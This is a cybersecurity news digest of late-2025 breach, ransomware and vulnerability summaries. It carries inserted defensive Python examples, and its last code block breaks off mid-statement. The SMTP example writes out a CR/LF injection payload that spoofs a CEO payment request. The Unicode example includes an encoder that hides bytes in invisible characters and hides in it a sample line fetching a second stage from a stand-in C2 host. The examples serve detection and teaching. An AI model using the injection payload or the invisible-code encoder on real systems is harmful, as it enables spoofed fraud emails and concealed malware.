Tengu Ransomware Hits Brazilian Education Provider

The Tengu ransomware group has claimed responsibility for a cyberattack against UniCursos, a prominent education provider in Brazil. The attack, which was posted to the group's leak site on October 23, 2025, follows the common double-extortion model, where the attackers threaten to publish sensitive stolen data if their ransom demands are not met. The incident highlights the continued targeting of the education sector by ransomware gangs, who view them as valuable targets due to the sensitive student and staff data they hold.

Oct 24, 2025 · 4 min read

Ransomware Hits Jewett-Cameron, Steals Financial Data

Jewett-Cameron, an Oregon-based manufacturing and distribution company, has confirmed in an SEC filing that it suffered a ransomware attack on October 15, 2025. The attack caused significant disruption to its business operations and resulted in the theft of sensitive corporate data. The exfiltrated information reportedly includes IT and financial data being prepared for the company's upcoming Form 10-K filing, as well as screen captures from video meetings. The unidentified attackers have demanded a ransom and threatened to leak the stolen material.

Oct 24, 2025 · 4 min read

Lawsuit Hits SC School District After Ransomware Breach

South Carolina's Lexington-Richland School District 5 (LR5) is facing a class-action lawsuit following a ransomware attack in June 2025 that exposed the personally identifiable information (PII) of over 31,000 students, staff, and alumni. The lawsuit alleges that the school district was negligent in protecting sensitive data and violated state law by failing to provide timely and complete notification of the breach. The compromised data included names, birthdates, Social Security numbers, and financial files, making it one of the most significant breaches for an educational institution in the region.

Oct 24, 2025 · 4 min read

Lazarus Group's 'Operation DreamJob' Targets EU Drone-Makers

The notorious North Korea-linked APT group, Lazarus, is conducting a cyber-espionage campaign dubbed 'Operation DreamJob' targeting European defense and aerospace companies. The campaign specifically focuses on firms involved in Unmanned Aerial Vehicle (UAV) technology. The attackers use sophisticated social engineering, creating fake recruiter profiles and job offers to lure employees. The ultimate goal is to compromise the target's network to steal sensitive intellectual property related to advanced drone technology.

Oct 24, 2025 · 5 min read

Iran's MuddyWater APT Targets 100+ Governments with Phoenix Backdoor

The Iranian state-sponsored threat group MuddyWater is conducting a large-scale cyber-espionage campaign targeting over 100 government entities, primarily in the Middle East and North Africa (MENA). According to Group-IB, the attackers are using phishing emails sent from a compromised mailbox, leveraging the NordVPN service for anonymity. The emails contain malicious Word documents that use macros to deploy version 4 of the 'Phoenix' backdoor, a payload designed for foreign intelligence gathering. The campaign highlights the group's return to classic macro-based attack vectors.

Oct 23, 2025 · 6 min read

Unit 42 Exposes 'Smishing Deluge' from China and 'Jingle Thief' Gift Card Fraud

Researchers at Palo Alto Networks' Unit 42 have detailed two distinct and significant cybercrime operations. The first, a massive smishing campaign dubbed 'The Smishing Deluge,' is attributed to a China-based threat actor and is flooding mobile users globally with malicious SMS messages. The second campaign, named 'Jingle Thief,' is a sophisticated cloud-based operation focused on automating the theft and monetization of gift cards. These findings, highlighted in Unit 42's October Threat Bulletin, showcase the diverse tactics of modern criminals, from large-scale social engineering to highly targeted financial fraud.

Oct 23, 2025 · 5 min read

Critical RCE Flaw in WSUS Allows Unauthenticated SYSTEM Takeover

A critical remote code execution (RCE) vulnerability, CVE-2025-59287, with a CVSS score of 9.8, has been discovered in Microsoft's Windows Server Update Services (WSUS). The flaw allows an unauthenticated attacker with network access to the WSUS endpoint (by default TCP 8530/8531) to gain SYSTEM-level privileges on a vulnerable server by sending a maliciously crafted cookie, which the service deserializes unsafely. Only servers with the WSUS role enabled are affected. While not yet exploited in the wild at the time of writing, Microsoft rates exploitation as "more likely." Given that compromising WSUS could let an attacker push malicious updates to every client it manages, immediate patching is strongly advised.

Oct 23, 2025 · 4 min read

Massive Prosper Data Breach Exposes Social Security Numbers of 17.6 Million Users

The peer-to-peer lending platform Prosper has confirmed a catastrophic data breach compromising the sensitive personally identifiable information (PII) of approximately 17.6 million people. The exposed data includes full names, physical addresses, IP addresses, income levels, and, most critically, Social Security numbers. The breach, first detected in September 2025, places millions of individuals at severe risk of identity theft and sophisticated financial fraud.

Oct 23, 2025 · 7 min read

NY Regulator Puts Financial Firms on Notice: You Are Accountable for Your Vendors' Security

The New York State Department of Financial Services (DFS) has issued new guidance for financial institutions, emphasizing their ultimate accountability for managing cybersecurity risks originating from third-party service providers (TPSPs). The regulator warned that as firms increasingly rely on cloud computing, AI, and fintech solutions from vendors, their exposure to threats grows. The guidance explicitly states that boards of directors and senior officers must possess sufficient cybersecurity knowledge to oversee and challenge management's third-party risk strategies. DFS Acting Superintendent Kaitlin Asrow stressed that regulated entities cannot outsource their responsibility for protecting consumer data and ensuring operational security.

Oct 23, 2025 · 5 min read

Healthcare Breaches Seem to Drop, But Government Shutdown Hides True Numbers

Official data for September 2025 shows only 26 major healthcare data breaches, the lowest monthly total since 2018. However, The HIPAA Journal cautions that this apparent decline is misleading. A US government shutdown has largely halted the HHS's Office for Civil Rights (OCR) from processing and updating its public breach portal. The 26 reported breaches affected over 1.29 million individuals, with hacking incidents accounting for 98.8% of the exposed records. Experts believe the true number of breaches for September is significantly higher and will be reflected in a surge of reports once the OCR resumes normal operations.

Oct 23, 2025 · 5 min read

Palomar Health Breach Exposes Highly Sensitive Patient Data, Including Biometrics

Palomar Health Medical Group (PHMG), a California-based healthcare provider, has announced it was the victim of a cybersecurity incident that exposed sensitive patient data. The compromised information includes not only names and personal identifiers but also highly sensitive data types such as biometric data, U.S. alien registration numbers, and financial account information. The full scope of the breach, including the number of affected patients, has not yet been disclosed. The national class action law firm Lynch Carpenter is now investigating claims against PHMG, signaling significant legal and financial fallout for the provider.

Oct 23, 2025 · 5 min read

CrowdStrike: 76% of Organizations Can't Keep Pace with AI-Powered Ransomware

According to CrowdStrike's '2025 State of Ransomware Survey,' a staggering 76% of global organizations feel their defensive capabilities cannot match the speed and sophistication of AI-powered cyberattacks. Adversaries are now weaponizing artificial intelligence to accelerate every stage of the ransomware attack chain, from malware creation to social engineering, rendering legacy detection methods obsolete. Nearly half of organizations now view AI-automated attacks as their single greatest ransomware threat.

Oct 23, 2025 · 5 min read

UK's NCSC Warns of Doubling 'Nationally Significant' Cyberattacks, Cites Supply Chain Risk

The UK's National Cyber Security Centre (NCSC) has reported a sharp increase in cyberattacks, with 'nationally significant' cases more than doubling in the past year. In response, the NCSC is urging organizations to bolster their incident preparedness. Experts are pointing to vulnerabilities within the digital supply chain as a primary entry point for these attacks, with service providers like helpdesks becoming gateways to core business systems. A recent survey found that nearly a third of UK procurement managers reported a supply chain partner had been attacked in recent months.

Oct 22, 2025 · 4 min read

Critical Netty Zero-Day Bypasses All Major Email Authentication

A critical zero-day vulnerability, CVE-2025-59419, has been discovered in the widely used Netty Java networking library, affecting applications that build outbound SMTP commands with its SMTP codec. The flaw allows an attacker who controls a command argument, such as a sender or recipient address, to perform SMTP injection by embedding carriage-return and line-feed characters, which terminate the command early and let the attacker append commands of their own. Because the injected message is then relayed by a legitimate, authorized mail server, standard checks like SPF, DKIM, and DMARC pass rather than being defeated, making it possible to send highly convincing spoofed emails that appear to originate from trusted domains. A patch is available and should be applied immediately; until then, reject any CR or LF in values that reach an SMTP command.

Oct 22, 2025 · 6 min read
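The mechanism behind the Netty entry above, as an added example that is not code from the Netty project or the CVE-2025-59419 advisory: a CR/LF inside one SMTP argument becomes extra lines on the wire, and an encoder that validates arguments refuses the same input. The addresses, the injected message and the function names (encode_command, split_lines, demo) are constructed for the demo.

```python
"""Added example: SMTP command injection via CR/LF, and the check that stops it."""
import re

CRLF = "\r\n"
_BAD_CHARS = re.compile(r"[\r\n]")  # reject a bare CR or bare LF too, not only the pair


class SmtpInjectionError(ValueError):
    """Raised when an argument would terminate the command line early."""


def encode_command(verb: str, *args: str, validate: bool = True) -> bytes:
    """Serialise one SMTP command line, e.g. encode_command("RCPT", "TO:<a@b.example>").

    validate=False mimics an encoder that trusts its caller: whatever is in an
    argument goes straight to the socket, line terminators included.
    """
    if validate:
        for arg in args:
            if _BAD_CHARS.search(arg):
                raise SmtpInjectionError(f"CR/LF in SMTP argument: {arg!r}")
    line = " ".join((verb, *args))
    return (line + CRLF).encode("utf-8")


def split_lines(wire: bytes) -> list[str]:
    """Read the byte stream the way an SMTP server does: one line per CRLF."""
    return [line for line in wire.decode("utf-8").split(CRLF) if line]


# Constructed attacker-controlled recipient: a real-looking address followed by a
# whole DATA section, so the (SPF/DKIM-authorised) relay sends mail as a trusted sender.
TAINTED_RECIPIENT = (
    "<victim@example.com>" + CRLF
    + "DATA" + CRLF
    + "From: CEO <ceo@trusted.example>" + CRLF
    + "Subject: Urgent wire transfer" + CRLF
    + CRLF
    + "Please pay the attached invoice today." + CRLF
    + "."
)


def demo() -> tuple[list[str], bool]:
    """Return (lines the server sees from the unchecked encoder,
    whether the validating encoder refused the same input)."""
    seen = split_lines(encode_command("RCPT", "TO:" + TAINTED_RECIPIENT, validate=False))
    try:
        encode_command("RCPT", "TO:" + TAINTED_RECIPIENT)
        refused = False
    except SmtpInjectionError:
        refused = True
    return seen, refused


if __name__ == "__main__":
    lines, refused = demo()
    for line in lines:
        print("server sees:", line)
    print("validating encoder refused the input:", refused)
```

The point of the check is that it runs on every argument of every command the client emits, not only on addresses: a subject line or a display name that reaches MAIL FROM or RCPT TO is just as dangerous as the recipient itself.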

Patch Now: Critical RCE Flaws in Oracle E-Business Suite Marketing Module

Oracle has issued urgent patches for two critical, unauthenticated remote code execution (RCE) vulnerabilities in its E-Business Suite. The flaws, CVE-2025-53072 and CVE-2025-62481, both carry a CVSS score of 9.8 and affect the Oracle Marketing module. An attacker with network access can exploit these vulnerabilities via a simple HTTP request, without any user interaction, to achieve a full takeover of the marketing component. Oracle urges customers using affected versions (12.2.3 through 12.2.14) to apply the October 2025 Critical Patch Update immediately.

Oct 22, 2025 · 5 min read

DHS Breach: 'CitrixBleed 2.0' Zero-Day Exposes FEMA & CBP Employee Data

A critical zero-day vulnerability in Citrix NetScaler Gateway, dubbed 'CitrixBleed 2.0' (CVE-2025-5777), was exploited to breach the U.S. Department of Homeland Security. The attack, which began in June 2025, compromised the personal and employment data of staff at the Federal Emergency Management Agency (FEMA) and U.S. Customs and Border Protection (CBP). The threat actor gained initial access through FEMA's Region 6 network and moved laterally, leading to significant federal scrutiny and subsequent staff dismissals.

Oct 21, 2025 · 5 min read

Chinese APT Salt Typhoon Targets European Telecom with SNAPPYBEE Backdoor

The Chinese state-sponsored group Salt Typhoon has been observed targeting a European telecommunications firm by exploiting a known Citrix NetScaler vulnerability for initial access. Post-exploitation, the attackers deployed a backdoor known as SNAPPYBEE (or Deed RAT) using DLL side-loading techniques, hiding the malicious payload alongside legitimate antivirus executables to evade detection. The attack, which was part of a broader cyber-espionage campaign, was detected in its early stages by Darktrace before significant data exfiltration occurred.

Oct 21, 2025 · 5 min read

'GlassWorm' Worm Uses Unicode Obfuscation and Solana C2 in VS Code Supply Chain Attack

A highly sophisticated, self-propagating worm named 'GlassWorm' is targeting Visual Studio Code (VS Code) developers through malicious extensions on the Open VSX registry. The malware employs advanced evasion techniques, including using invisible Unicode characters to obfuscate its code and leveraging the Solana blockchain for a resilient command-and-control (C2) infrastructure. The worm is designed to steal NPM, GitHub, and Git credentials, as well as drain cryptocurrency from 49 different wallet extensions.

Oct 21, 2025 · 5 min read
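A check for the obfuscation trick in the GlassWorm entry above, as an added example that is not GlassWorm's code and is not taken from Koi Security or Open VSX: a scanner that flags invisible or format-only Unicode code points in source text and measures how long the runs are. To construct a sample, hide_bytes and reveal_bytes implement one common smuggling scheme (one byte per variation selector); the page does not say which code points GlassWorm used, so treat SUSPECT_RANGES as a checklist rather than a signature. The snippet, the payload and the hostname are made up.

```python
"""Added example: find invisible Unicode characters hidden in source code."""
import unicodedata

# Ranges that render as nothing, or only modify the glyph before them, in an editor.
SUSPECT_RANGES = (
    (0x200B, 0x200F),    # zero-width space/non-joiner/joiner, LRM, RLM
    (0x202A, 0x202E),    # bidi embeddings and overrides ("Trojan Source")
    (0x2060, 0x2064),    # word joiner, invisible operators
    (0x2066, 0x2069),    # bidi isolates
    (0xFE00, 0xFE0F),    # variation selectors 1-16
    (0xFEFF, 0xFEFF),    # zero-width no-break space (legitimate only as a leading BOM)
    (0xE0000, 0xE007F),  # tag characters
    (0xE0100, 0xE01EF),  # variation selectors 17-256
)


def is_suspect(ch: str) -> bool:
    cp = ord(ch)
    if any(lo <= cp <= hi for lo, hi in SUSPECT_RANGES):
        return True
    return unicodedata.category(ch) == "Cf"  # catch-all for other format characters


def hide_bytes(payload: bytes) -> str:
    """Encode each byte as one variation selector (0-15 -> U+FE00.., 16-255 -> U+E0100..)."""
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in payload)


def reveal_bytes(hidden: str) -> bytes:
    """Inverse of hide_bytes; what a loader inside the extension would do at run time."""
    out = bytearray()
    for ch in hidden:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)
        else:
            raise ValueError(f"not a variation selector: U+{cp:04X}")
    return bytes(out)


def scan_source(text: str) -> list[tuple[int, int, str, str]]:
    """Return (line, column, code point, Unicode name) for every suspect character."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if lineno == 1 and col == 1 and ch == "\ufeff":
                continue  # a leading BOM is normal
            if is_suspect(ch):
                findings.append((lineno, col, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>")))
    return findings


def longest_run(text: str) -> int:
    """Longest run of consecutive suspect characters: a long run is the signature of a
    payload encoded into invisible code points, as opposed to a stray joiner in a string."""
    best = cur = 0
    for ch in text:
        cur = cur + 1 if is_suspect(ch) else 0
        best = max(best, cur)
    return best


# Constructed sample: a harmless-looking extension snippet with a hidden string after 'hello'.
HIDDEN_PAYLOAD = b"fetch('http://c2.invalid/stage2')"
SAMPLE_SOURCE = (
    "// constructed sample, not a real extension\n"
    "const banner = 'hello' + '" + hide_bytes(HIDDEN_PAYLOAD) + "';\n"
    "module.exports = { banner };\n"
)

if __name__ == "__main__":
    for line, col, cp, name in scan_source(SAMPLE_SOURCE)[:3]:
        print(f"line {line} col {col}: {cp} {name}")
    print("longest invisible run:", longest_run(SAMPLE_SOURCE))
```

Run it over the unpacked .vsix contents (extension.js and any bundled scripts) before installing an extension from a registry you do not control; a run of hundreds of suspect code points in a string literal deserves a closer look, whereas a single zero-width joiner in an emoji table does not.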

Russian APT COLDRIVER Rapidly Deploys New NOROBOT Malware After Public Disclosure

The Russian state-sponsored threat group COLDRIVER, also known as Star Blizzard and UNC4057, has demonstrated remarkable operational agility by deploying new malware families just five days after its LOSTKEYS malware was publicly disclosed in May 2025. According to Google's Threat Intelligence Group (GTIG), the group has ceased using LOSTKEYS and is now actively using a new toolset, including the NOROBOT DLL and a PowerShell backdoor called MAYBEROBOT, to target high-value individuals such as NGOs, policy advisors, and dissidents.

Oct 21, 2025 · 5 min read

UK Regulators Issue Cyber Recovery Guide for Financial Firms

The United Kingdom's top financial regulators—the Bank of England (BoE), the Financial Conduct Authority (FCA), and the Prudential Regulation Authority (PRA)—have jointly published a guide on effective cyber response and recovery practices. The guidance, aimed at all financial firms, emphasizes the critical need for the ability to recover from severe attacks by using immutable backups, maintaining segregated recovery environments, and conducting rigorous testing of both internal and third-party resilience.

Oct 21, 2025 · 4 min read

EU Launches Cybersecurity Reserve to Bolster Incident Response Across Member States

The European Union has officially established the European Cybersecurity Reserve as a key component of its Cyber Solidarity Act. Managed by the EU Agency for Cybersecurity (ENISA), the reserve has a €36 million budget and consists of 45 pre-vetted, trusted private providers, such as Airbus Protect and Spike Reply. This 'cyber reinforcement team' is designed to be deployed to assist EU member states and institutions during large-scale cyber incidents affecting critical infrastructure.

Oct 21, 2025 · 3 min read

'Cavalry Werewolf' APT Targets Russian Critical Infrastructure with Custom Malware

The Advanced Persistent Threat (APT) group known as Cavalry Werewolf (also tracked as YoroTrooper and Silent Lynx) conducted a targeted cyberattack campaign against Russia's public sector and critical industries between May and August 2025. The group leveraged spear-phishing emails to deliver custom malware, including FoalShell and StallionRAT. Post-compromise activities focused on reconnaissance and establishing persistence via Windows Registry modifications, while using SOCKS5 proxies for command-and-control and data exfiltration.

Oct 21, 2025 · 5 min read

CISA Mandates Patching for 5 New Actively Exploited Flaws in Apple, Microsoft, Oracle, and Kentico

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The flaws affect a range of widely used products, including Apple devices, Kentico Xperience, Microsoft Windows SMB Client, and Oracle E-Business Suite. Federal agencies are now mandated to apply patches by a specified deadline, and CISA strongly urges all organizations to prioritize remediation to mitigate significant cyber risk.

Oct 20, 2025 · 8 min read
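The KEV entries on this page (the unspecified addition of October 22, the Patch Tuesday zero-days, and the five flaws above) all come down to the same operational question: which of my hosts carry a catalogued CVE, and when is its BOD 22-01 deadline? Below is an added example, not CISA tooling, that turns a KEV catalog export into a per-host work list. KEV_SAMPLE is a constructed excerpt in the field layout of CISA's JSON feed (cveID, vendorProject, product, vulnerabilityName, dateAdded, requiredAction, dueDate, knownRansomwareCampaignUse); the dates, descriptions and ransomware flags in it are illustrative, not CISA's published values, and the hostnames are made up.

```python
"""Added example: match a host inventory against a KEV catalog export."""
import json
from datetime import date, timedelta

# Constructed excerpt in the shape of CISA's KEV feed; every value here is a demo value.
KEV_SAMPLE = json.dumps({
    "catalogVersion": "demo",
    "dateReleased": "2025-10-27T00:00:00.0000Z",
    "count": 3,
    "vulnerabilities": [
        {"cveID": "CVE-2025-5777", "vendorProject": "Citrix",
         "product": "NetScaler ADC and Gateway", "vulnerabilityName": "demo: CitrixBleed 2.0",
         "dateAdded": "2025-06-20", "requiredAction": "Apply vendor fix (demo)",
         "dueDate": "2025-07-11", "knownRansomwareCampaignUse": "Known", "notes": "demo"},
        {"cveID": "CVE-2025-54236", "vendorProject": "Adobe",
         "product": "Commerce and Magento", "vulnerabilityName": "demo: SessionReaper",
         "dateAdded": "2025-10-10", "requiredAction": "Apply vendor fix (demo)",
         "dueDate": "2025-10-31", "knownRansomwareCampaignUse": "Unknown", "notes": "demo"},
        {"cveID": "CVE-2025-59287", "vendorProject": "Microsoft",
         "product": "Windows Server Update Services", "vulnerabilityName": "demo: WSUS deserialization",
         "dateAdded": "2025-10-24", "requiredAction": "Apply vendor fix (demo)",
         "dueDate": "2025-11-14", "knownRansomwareCampaignUse": "Unknown", "notes": "demo"},
    ],
})

# Constructed inventory: host -> CVEs a vulnerability scanner reported for it.
INVENTORY = {
    "wsus01.corp.example": ["CVE-2025-59287"],
    "shop-web01.corp.example": ["CVE-2025-54236"],
    "vpn-gw01.corp.example": ["CVE-2025-5777"],
    "dev-laptop-17.corp.example": ["CVE-2025-10585"],  # absent from this excerpt, so not listed
}


def kev_work_list(kev_json: str, inventory: dict[str, list[str]],
                  today: date, soon_days: int = 7) -> list[dict]:
    """One row per (host, CVE) present in the catalog, most urgent first."""
    catalog = {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}
    rows = []
    for host, cves in inventory.items():
        for cve in cves:
            entry = catalog.get(cve)
            if entry is None:
                continue  # not in KEV: still patch it, but it is not on the directive's clock
            due = date.fromisoformat(entry["dueDate"])
            if due < today:
                status = "overdue"
            elif due <= today + timedelta(days=soon_days):
                status = "due_soon"
            else:
                status = "open"
            rows.append({
                "host": host, "cve": cve, "product": entry["product"],
                "due": due.isoformat(), "status": status,
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
            })
    # Earliest deadline first; among equal deadlines, ransomware-linked flaws first.
    rows.sort(key=lambda r: (r["due"], not r["ransomware"], r["host"]))
    return rows


if __name__ == "__main__":
    for r in kev_work_list(KEV_SAMPLE, INVENTORY, date.today()):
        flag = " [ransomware]" if r["ransomware"] else ""
        print(f'{r["status"]:9} {r["due"]} {r["cve"]:15} {r["host"]} ({r["product"]}){flag}')
```

In production, replace KEV_SAMPLE with the live feed and INVENTORY with your scanner's export; the due dates are the ones in the catalog, not the dateAdded plus a fixed interval, because CISA sets shorter deadlines for some entries.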

Anubis Ransomware Hits Australian Engineering Firm Aussie Fluid Power

The Australian industrial engineering company, Aussie Fluid Power, has confirmed it was hit by a ransomware attack claimed by the emerging 'Anubis' ransomware group. The incident, which has impacted company operations and stakeholder data, aligns with warnings from the Australian Cyber Security Centre (ACSC) about increasing cyber threats to critical infrastructure and the industrial sector. This attack underscores the growing risk posed by new ransomware gangs targeting operational technology (OT) environments.

Oct 20, 2025 · 7 min read

EU and Ukraine Deepen Cyber Defense Alliance in Face of Russian Aggression

The European Union and Ukraine have reaffirmed their strategic partnership on cybersecurity during their 4th Cyber Dialogue held in Kyiv. Against the backdrop of Russia's ongoing war, both parties committed to deepening cooperation on cyber defense, policy alignment with EU standards like the NIS2 Directive, and the protection of critical infrastructure. Ukraine will continue to share threat intelligence gained from defending against Russian cyberattacks to bolster the EU's collective security.

Oct 20, 2025 · 5 min read

Lending Platform Prosper Breached, 17.6 Million Accounts Exposed

The peer-to-peer lending platform Prosper has confirmed a massive data breach that exposed the personal and sensitive information of approximately 17.6 million user accounts. The breach notification service 'Have I Been Pwned' has already incorporated the data set, which includes names, email addresses, and phone numbers. The incident places millions of users at a significantly higher risk of targeted phishing campaigns, identity theft, and other fraudulent activities. Affected users are strongly advised to change their passwords and enable multi-factor authentication immediately.

Oct 20, 2025 · 4 min read

Clop Ransomware Claims Harvard University Breach, Threatens Data Leak

The prolific Russian-speaking ransomware group Clop has claimed responsibility for a cyberattack against Harvard University, adding the prestigious institution to its data leak site on October 12, 2025. The group, known for its 'big-game hunting' and exploitation of zero-day vulnerabilities, threatened to publish stolen data, stating that a torrent link would be available soon. The claim has not yet been confirmed by Harvard. Clop, also known as TA505, has a history of high-profile attacks using double-extortion tactics, including the mass exploitation of flaws in MOVEit Transfer and GoAnywhere MFT, which affected hundreds of organizations worldwide.

Oct 19, 2025 · 5 min read

F5 Breached by Nation-State Actor; BIG-IP Source Code Stolen, CISA Issues Emergency Directive

Application security vendor F5 has disclosed a major security breach attributed to a 'highly sophisticated nation-state threat actor.' The attackers maintained long-term access to F5's internal development environments, exfiltrating portions of the BIG-IP source code, information on undisclosed vulnerabilities, and some customer configuration data. While F5 states there is no evidence of software supply chain modification, the incident poses a significant future risk. In response, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 26-01, mandating all federal civilian agencies to immediately patch F5 products, inventory devices, and remove end-of-life systems from their networks.

Oct 19, 2025 · 5 min read

Massive Airline Data Breach Hits 13 Million Vietnam Airlines and Qantas Customers

A major data breach originating from a third-party service provider has compromised the personal information of approximately 13 million customers of Vietnam Airlines and Qantas. A group calling itself 'Scattered LAPSUS$ Hunters' claims to have stolen the data in June by breaching the Salesforce accounts of a technology partner used by the airlines. The leaked data includes full names, dates of birth, email addresses, phone numbers, and loyalty program details. Both airlines have confirmed the breach and are urging customers to change their passwords.

Oct 19, 2025 · 5 min read

"SIMCARTEL" CaaS Network Busted in Major European Takedown

A coordinated international law enforcement operation codenamed "SIMCARTEL" has dismantled a massive Cybercrime-as-a-Service (CaaS) platform operating out of Latvia. The operation, involving authorities from Austria, Estonia, and Finland with support from Europol, resulted in seven arrests and the seizure of a vast infrastructure that enabled millions of euros in financial fraud. The network provided criminals with access to over 40,000 active SIM cards via SIM box devices, which were used to create approximately 49 million fraudulent online accounts, facilitating crimes like phishing, smishing, and investment fraud across Europe.

Oct 19, 2025 · 5 min read

Silver Fox APT Expands Reach, Targets Japan and Malaysia with New RAT

The Chinese-nexus cybercrime group known as "Silver Fox" has expanded its targeting beyond China and Taiwan to include organizations in Japan and Malaysia. Researchers report the group is using phishing emails with malicious PDFs to distribute the HoldingHands RAT. This expansion follows previous campaigns where the group used diverse tactics, including SEO poisoning to spread the Winos 4.0 (ValleyRAT) malware and Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software. The group's evolving tactics and widening geographic scope indicate an increased threat to government and commercial entities across Asia.

Oct 19, 2025 · 5 min read

Panera Bread Reaches $2.5M Settlement for 2024 Data Breach

Panera Bread has agreed to a $2.5 million settlement to resolve a class-action lawsuit related to a data breach that occurred in March 2024. The breach exposed the personal information, including names and Social Security numbers, of approximately 147,321 individuals, primarily current and former employees. Under the settlement, affected individuals can file claims for reimbursement of expenses and time spent dealing with the breach's aftermath, with a claim deadline of November 11, 2025.

Oct 19, 2025 · 4 min read

Volkswagen Probes 8Base Ransomware Attack Claim

The Volkswagen Group is investigating a claim from the 8Base ransomware group that it has breached the automotive giant and stolen sensitive data. 8Base, a data extortion group linked to Phobos ransomware, posted a trove of allegedly stolen files on its dark web site, including accounting documents and employee contracts. Volkswagen stated its core IT systems are secure but acknowledged the possibility of a breach through a third-party supplier, highlighting the growing threat of supply chain attacks. The incident places Volkswagen under potential GDPR scrutiny.

Oct 19, 2025 · 5 min read

'Mysterious Elephant' APT Evolves, Deploys Custom Tools in Espionage Campaign

The cyber-espionage group known as 'Mysterious Elephant' has demonstrated a significant evolution in its capabilities, moving away from recycled malware to deploying its own custom-developed tools. Since early 2025, the APT group has been targeting government and diplomatic entities in South Asia. This strategic shift indicates an increased level of sophistication and investment, allowing the group to create more effective and evasive malware for its intelligence-gathering operations. The campaign poses a notable threat to the targeted governments and may have indirect implications for European nations with interests in the region.

Oct 18, 2025 · 5 min read

Microsoft Patches 172 Flaws, Including Three Actively Exploited Zero-Days

Microsoft's October 2025 Patch Tuesday update is one of the largest of the year, addressing 172 vulnerabilities across its product suite. The release is critically important because it includes patches for three zero-day vulnerabilities under active attack, among them an elevation-of-privilege flaw in the Windows Remote Access Connection Manager (CVE-2025-59230), which has been added to CISA's KEV catalog. Separately, a critical, pre-authentication remote code execution vulnerability (CVE-2025-59287) in Windows Server Update Services (WSUS), carrying a 9.8 CVSS score, requires immediate attention: every client trusts its WSUS server for updates, so a compromised one is a ready-made internal distribution point. The update also marks the final security patch for most versions of Windows 10, pushing organizations toward migration.

Oct 18, 2025 · 5 min read

Cisco Zero-Day Flaw Actively Exploited to Implant Linux Rootkits on Network Switches

A critical zero-day vulnerability in Cisco IOS and IOS XE software, tracked as CVE-2025-20352, has been actively exploited in the wild to install Linux rootkits on network devices. The campaign, dubbed 'Operation Zero Disco' by Trend Micro, targeted Cisco 9400, 9300, and 3750G series switches. The attackers used the SNMP stack overflow for remote code execution, which requires valid high-privilege administrative credentials in addition to SNMP access, and implanted a fileless rootkit that lives only in memory: it leaves no on-disk artifact and vanishes on reboot, so rebooting both cleans the device and destroys the evidence. Cisco has released patches and urges customers to update affected devices immediately; until then, restricting SNMP to trusted management hosts removes the exposure.

Oct 18, 2025 · 5 min read

Deloitte to Pay $6.3M in Settlement for Rhode Island Data Breach Affecting 640,000

Deloitte has agreed to a proposed $6.3 million class-action settlement related to a 2024 cyberattack that compromised the personal data of 640,000 Rhode Island residents—nearly half the state's population. The breach affected the state's 'RIBridges' social services system, which was managed by Deloitte. The incident resulted in significant disruption to state government services and the eventual leak of some compromised data on the dark web. This settlement is in addition to a previous $5 million payment Deloitte made to the state to cover breach-related expenses.

Oct 18, 2025 · 4 min read

New 'CAPI Backdoor' Malware Targets Russian Auto and E-Commerce Firms

A new cyberespionage campaign is targeting the Russian automobile and e-commerce sectors using a previously undocumented .NET malware known as 'CAPI Backdoor'. According to researchers at Seqrite Labs, the attack is initiated through phishing emails containing a ZIP archive with a malicious LNK file. The malware uses a living-off-the-land technique, executing via 'rundll32.exe', and establishes persistence through scheduled tasks and startup folder entries. CAPI Backdoor is designed to gather system information, check for antivirus products, and exfiltrate data to a C2 server.

Oct 18, 2025 · 4 min read

Everest Ransomware Claims Collins Aerospace Hack; Leak Site Mysteriously Goes Offline

The Everest ransomware group has claimed responsibility for the September 2025 cyberattack on Collins Aerospace, a major aviation and defense contractor. The attack caused widespread disruption, affecting check-in and boarding systems at major European airports like Heathrow and Brussels. Shortly after posting the claim on its dark web data leak site, the site became inaccessible, displaying a "Fatal error" message. This has fueled speculation about a potential law enforcement takedown or internal disruption within the ransomware group.

Oct 18, 2025 · 4 min read

Massive Supply Chain Risk Found in VSCode Marketplace; 100+ Extensions Leaked Access Tokens

Researchers at Wiz have discovered a significant supply chain risk in the popular VSCode and OpenVSX extension marketplaces. They found that publishers of over 100 extensions had inadvertently leaked their access tokens, which could have allowed attackers to hijack the extensions and distribute malware to more than 150,000 users. The research also uncovered over 550 exposed secrets within 500+ extensions, providing access to developer accounts on services like AWS, GitHub, and OpenAI, further highlighting the pervasive security risks in the software development ecosystem.
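The practical check behind this finding is simple: a .vsix is a zip archive, and the leaked material sits in files that were never meant to be packaged. The Python below is an added example, not Wiz's scanner or any marketplace code. It unpacks a package in memory, flags files that should never ship (.env, .npmrc, private keys) and greps the rest for well-known token prefixes (AWS, GitHub, npm, OpenAI). The pattern set is a deliberately small assumption; a real scanner adds many more patterns, entropy checks and live validation. The .vsix it builds, and the tokens inside it, are constructed for the demo.

```python
"""Scan a VS Code / Open VSX extension package (.vsix, a zip archive) for
leaked secrets. Added example; not Wiz's scanner or any marketplace code.
The token prefixes are publicly documented, but the pattern set is a
minimal assumption, and the .vsix built below is constructed for the demo."""
import io
import re
import zipfile

# Assumption: a small set of high-confidence prefix patterns. Production
# scanners add many more, entropy checks, and live validation of hits.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "npm_token": re.compile(r"\bnpm_[A-Za-z0-9]{36}\b"),
    "openai_api_key": re.compile(r"\bsk-[A-Za-z0-9_-]{32,}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

# Files that should never ship inside an extension package at all.
SUSPICIOUS_NAMES = re.compile(
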